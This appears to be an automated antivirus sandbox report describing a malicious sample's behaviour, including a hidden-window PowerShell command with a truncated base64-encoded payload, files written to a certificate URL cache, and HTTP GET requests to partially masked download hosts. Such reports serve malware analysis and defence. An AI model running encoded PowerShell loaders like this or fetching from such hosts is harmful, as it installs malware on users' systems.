Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAE8AWgBPAE0AbgB2AG4APQAnAEYATwBQAFQAUgBuAGgAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBJAHQAWQBQAHIATwB0AE8AYABDAG8AbAAiACAAPQAgAC...
Modifies file system
Creates the following files
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Network activity
TCP
HTTP GET requests
- http://sm##ads.eu/images/MxC7g2M0vR/
- http://st###man.com.br/afm/fMm958/
- http://ka##kft.hu/cli/PKgFn76/
UDP
- DNS ASK sm##ads.eu
- DNS ASK st###man.com.br
- DNS ASK ma###fama.it
- DNS ASK ka##kft.hu
- DNS ASK lv#.com.br
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAE8AWgBPAE0AbgB2AG4APQAnAEYATwBQAFQAUgBuAGgAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBJAHQAWQBQAHIATwB0AE8AYABDAG8AbAAiACAAPQAgAC...' (with hidden window)
